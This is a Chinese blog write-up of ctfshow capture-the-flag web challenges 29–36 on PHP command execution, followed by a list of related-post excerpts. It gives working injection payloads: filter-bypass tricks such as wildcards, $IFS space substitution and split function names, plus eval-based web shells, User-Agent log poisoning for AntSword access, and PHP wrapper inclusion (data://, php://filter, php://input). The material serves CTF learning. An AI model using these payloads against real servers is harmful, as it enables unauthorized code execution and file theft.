ctfshow web 命令执行 29~36

原创 已于 2025-11-01 16:54:34 修改 · 1.1k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #安全

于 2025-11-01 16:53:17 首次发布

#假期不断电,但是真的不想写作业,写点命令执行好了

  • web 29

    if (!preg_match (“/flag/i”, $c))
    所以flag被过滤了,且/i说明不区分大小写,不管那么多,先找到flag在哪里,构造payload:

    ?c=system("ls");

    发现存在文件flag.php,那很简单啦
    常见绕过方法有:

    1. 通配符

      1. ?通配符匹配单个字母

      2. *通配符匹配多个字母

      3. [x-x]或者是{x,x,x,x}

    2. 单双引号

      1. 单引号

      2. 双引号

      3. 反斜杠

      以cat指令为例,假如cat被过滤了,我们可以通过ca''t ca""t c"a"t ca\t这样来bypass

    3. 编码绕过
      比如用base64编码

    4. 变量赋值(拼贴)
      假如我们要执行指令whoami,我们可以 a=who;b=ami;$a.$b这样就会执行whoami指令

    本题可以构造payload:

    ?c=system("tac fla?.php");

    当然,还有很多绕过方法,都可以试试的

  • web 30

    过滤了flag、system、php,这里引入一下命令函数好了

    命令函数又分为有回显无回显

    有回显函数:

    1. system

    2. passthru

    3. pcntl_exec

      比较特殊,不可以在windows下运行

    无回显函数:

    1. exec

    2. shell_exec

    3. popen

      他的返回值是一个流,我们需要用fread函数读取

    4. 反引号

    其中有回显的直接执行就可以,无回显的需要类似于echo的操作才能看到执行结果

    例如本题可以构造payload:

    ?c=passthru("ls");
?c=echo `ls`;

    然后找到flag位置,用类似上一题的构造就可以拿到flag了

    但是本题使用?c=echo exec("ls");不太行,只能显示出index.php,具体原因我也不太清楚

    当然,如果你比较念旧,依旧想用system函数,也可以通过上一题介绍的过滤方法,例如:

    ?c=$a=sys;$b=tem;$d=$a.$b;$d("ls");

  • web 31

    空格和小数点被过滤了,但是空格过滤也是有绕过方法的

    空格绕过(并非每道题目都适用):

    1. 使用url编码:%20

    2. Tab键替代:%09

    3. 非断行空格:%a0

    4. 利用shell变量:$IFS$9

    5. 使用花括号,将命令和参数用逗号分隔并包裹在花括号中,比如

      {cat,flag}

    6. 使用重定向符号:<>

    7. 十六进制表示空格的ASCII编码:\x20

    这题依旧多种解法:

    1. 常规绕过:

      本题可以先用?c=passthru("ls");找出flag,再构造payload:

      ?c=passthru("tac\$IFS\$9fla*");
?c=passthru("tac%09fla*");

      $前加上反斜杠\表转义,防止$被php解释为变量,$IFS$9只有在shell命令中被解释为空格

    2. 嵌套eval函数:

      可以通过构造payload:

      ?c=eval($_GET[a]);&a=system('tac flag.php');

    3. 蚁剑连接:

      构造payload:

      ?c=eval($_POST[1]);

      连接中国蚁剑

      请添加图片描述

      然后flag就开袋即食了

    4. 日志注入(感觉昨天用了一天了

      流程和昨天的文件包含差不多,查看web服务器后

      构造payload:

      ?c=include%0a$_GET[1]?>&1=/var/log/nginx/access.log

      修改请求头

      User-Agent: <?php @eval($_POST['cmd']); ?>

      看看成效
      请添加图片描述

      嗯嗯,不错不错(应该没人发现这是web32的截图吧),接着蚁剑连接

      请添加图片描述

      依旧开袋即食

  • web 32~35

    左括号也被过滤了,这时可以用文件包含的方法解决该问题

    只需构造payload:

    ?c=include%0a$_GET[1]?>&1=伪协议

    伪协议详情可看我昨天发的文件包含,例如:

    ?c=include%0a$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php")?>

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php


?c=include%0a$_GET[1]?>&1=php://input
post数据:<?php system("tac flag.php")?>

    %0a可有可无

    当然也可以用日志注入,具体步骤同上题

  • web 36

    本来也想放上面一块的,但还是说一声,因为这题过滤数字,把上面方法的参数1改成字母就可以了(文件包含还不超标?

#本来还想做几题的,但是web37是文件包含,昨天做一天这类型了,今天歇会,晚点做做文件上传

言夕似时
关注
ctfshow 命令执行 web 29~124
shinygod的博客
02-22 586
原理:因为localeconv()的第个元素是“.”,然后pos()能够提取出当前元素的值,也就是“.”,而scandir()能过返回指定目录中的文件和目录的数组,然而上一层pos()已经提取出".“,这样就变成scandir(”.")返回当前目录下的目录数组,array_reverse()以相反的元素顺序返回数组,next()提取第二个元素,最后用read_file()、highlight_file()和show_source()读出源码。//若成功,则返回一个数组,若失败,则返回 false。
CTFshow 命令执行 web37-web40
m0_74312676的博客
10-06 1483
(5)将反转后的目录使用next函数,将flag.php文件输出,值得注意的是,我们这里输出的对象是文件,前面用到的print_r函数输出的对象是参数,于是我们这里就只能用show_source或者highlight_file。我们可以看到过滤了好多的符号,最重要的是单双引号,斜杠、逗号、以及$都过滤掉了,这意味着我们之前的哪些方法都用不了了。但是值得一提的是,这里过滤掉的是中文括号,英文括号并没有被过滤掉。有多种方式来实现,最常见的是利用hacker插件,将想要传输的参数,以post的方式传输。
CTFshow 命令执行 web29~web36(正则匹配绕过)
m0_74312676的博客
09-30 1905
web29~36的考点主要是一些常见的正则表达式的绕过。
CTFshow web入门 web41~web55 命令执行
qq_56815564的博客
04-15 2485
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了。简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。但是留下了一个一个或运算符( | )空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样。说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个。
CTFshow-命令执行-Web29~Web124
dasdasdasvsdV的博客
08-07 295
从这里可以看出是代码执行,eval会将字符串当作 PHP 代码来执行。这里flag被过滤了,用*或者?占位符就可以。
ctfshow web 命令执行 37~54
yanxi3329的博客
11-04 889
两天超大杯。
ctfshow web 命令执行 55~71
yanxi3329的博客
11-08 951
web72后面真不会做了。
2024年CTFshow web入门 web41~web55 命令执行_ctfshow web41(3),2024年最新程序员进阶
2401_84266286的博客
05-10 772
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTFShow Web入门 命令执行(持续更新)
tj13995958709的博客
04-22 2926
3.array_pop(next(get_defined_vars()))是将数组中最后一个键值对的值弹出,配和POST传入的1=phpinfo();过滤了数字、大小写字母和一些特殊符号,基本大部分的都过滤了,只能对ASCII码中没被过滤的字符进行匹配,需要用到python写一个自动化脚本,以下是摘自往上的python脚本代码。除了system()、反引号``可以执行系统命令,exec()、shell_exec()、passthru()等函数也可以。这题又多过滤的几个特殊符号,通配符*被过滤了,可以用?
ctfshow web入门 web29-40 命令执行-1
Azure_lyn的博客
08-13 773
本人初学,如有错误欢迎批评指正~
CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1908
CTFshow 命令执行 web29 web30 web31
CTFshow web入门 web29-------web56 命令执行wp
2202_75289892的博客
07-30 1015
过滤了flag,可见是文件名过滤,需要查看flag.php 或者flag.txt等文件。此外 读取文件利用cat函数,输出利用system、passthru。3.双引号绕过 fl''ag''.php。2.反斜杠绕过 fl\ag.php。1.通配符绕过 fla?还有特殊变量$1、内联执行等。
CTFSHOW-WEB入门-命令执行29-32
2301_80024722的博客
01-29 850
【代码】CTFSHOW-WEB入门-命令执行29-32。
网络安全 | 深入理解SQL注入的原理和防范
Andya_net的博客
11-16 857
SQL注入是一种常见的Web安全漏洞,攻击者通过将恶意SQL代码插入应用程序查询字符串,欺骗服务器执行未授权操作。其核心原理在于程序未对用户输入与SQL代码进行明确区分,导致数据被当作代码执行。常见攻击方式包括认证绕过(如万能密码)、数据窃取(通过UNION查询)和盲注攻击。防范SQL注入的最有效方法是使用参数化查询(Prepared Statements),确保用户输入仅作为数据而非指令被执行。其他措施包括使用ORM框架、遵循最小权限原则以及输入验证。开发者应杜绝字符串拼接式SQL,构建多层防御体系以确保
网络安全法》完成修改,AI安全正式“入法”
trusfort的博客
11-12 872
2025年5月,芯盾时代作为发起单位之一,联合中国科学院自动化研究所、北京大学、清华大学、中国信息通信研究院等政、企、学、研单位,共同创建国内首个AI安全与治理的研究机构——北京前瞻人工智能安全与治理研究院,以构筑全球化交流平台,共同开展人工智能安全研究与治理实践,构建覆盖技术研发、风险评估、伦理审查、应急处置的全链条安全治理体系,为国家的人工智能安全与治理体系贡献中坚力量。对于广大企业而言,新法的落地意味着,AI技术的安全、合规使用与治理,将成为未来业务持续经营与数字化转型成功的“生命线”。
网络安全Web入侵场景
最新发布
qq_33163046的博客
11-17 794
Web入侵检测与防御研究 本文系统分析了当前Web安全面临的主要威胁和防御对策。首先概述了Web入侵的定义及行业现状,指出多漏洞组合攻击趋势使防御难度加大。重点解析了SQL注入、文件上传、反序列化和模板注入四种核心攻击方式的原理、检测特征和防御措施。针对应急处置,提出了基于时间和文件两条线索的响应流程,详细介绍了WebShell排查的日志分析方法和内存马检测技术。最后通过企业服务器被植入内存马的实际案例,展示了完整的溯源分析过程。研究不仅梳理了Web安全的关键技术点,也为企业安全防护提供了实用参考,对提升W
云手机 服务器网络安全
wanhengidc的博客
11-13 416
云手机通过物理和逻辑隔离技术,确保每个用户的云手机实例相互独立,在物理层面,不同用户的云手机运行在不同的服务器资源上,避免资源共享带来的安全风险;手机平台对应用程序的权限进行严格管理。只有在用户明确授权且必要的情况下,应用才能获取这些权限,有效防止应用在用户不知情的情况下收集隐私信息。云手机与用户设备之间的数据传输面临诸多风险,如网络监听、中间人攻击等,为应对这些威胁,先进的加密协议被广泛应用,它通过对传输中的数据进行加密,确保数据在网络中以密文形式传输,即使数据被截取,攻击者也无法解读其中内容。
零信任云安全自适应升级实践:动态策略、行为分析与智能防御优化
2501_94098874的博客
11-13 1248
本文探讨零信任理念在云安全中的自适应升级策略。通过"永不信任、持续验证"原则,结合动态策略、行为分析和智能响应机制,实现云环境下的主动防御。文章详细介绍了基于风险评分的访问控制、全链路行为分析、闭环防御以及跨云协同等关键技术。实践表明,自适应零信任能显著提升安全响应速度,有效应对内部威胁和横向攻击。未来,AI驱动的威胁预测与自动化策略优化将进一步提升云环境的安全韧性。
免费的Web安全漏洞利用,Metasploit教程
2509_93947344的博客
11-14 390
我是网络安全爱好者小安,今天给大家带来一篇超级详细的Metasploit教程。作为一个完全免费的渗透测试框架,Metasploit真的太强大了,连很多专业安全公司都在用。Metasploit最早是由H.D. Moore在2003年开发的,现在已经发展成最受欢迎的开源渗透测试框架。Metasploit功能太强大了,我在这里只是抛砖引玉。建议大家先在虚拟环境中练习,不要在未经授权的情况下测试真实系统,那是违法行为哦!下面我以经典的"永恒之蓝"(MS17-010)漏洞为例,给大家演示完整过程。
ctfshow web入门命令执行41
01-25
### CTFShow Web 入门命令执行挑战解析 在处理CTFShow平台中的Web类别入门级别命令执行挑战时,理解如何利用PHP代码注入来实现远程命令执行(RCE)至关重要。通过分析给定的参数传递方式以及服务器端脚本的行为模式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值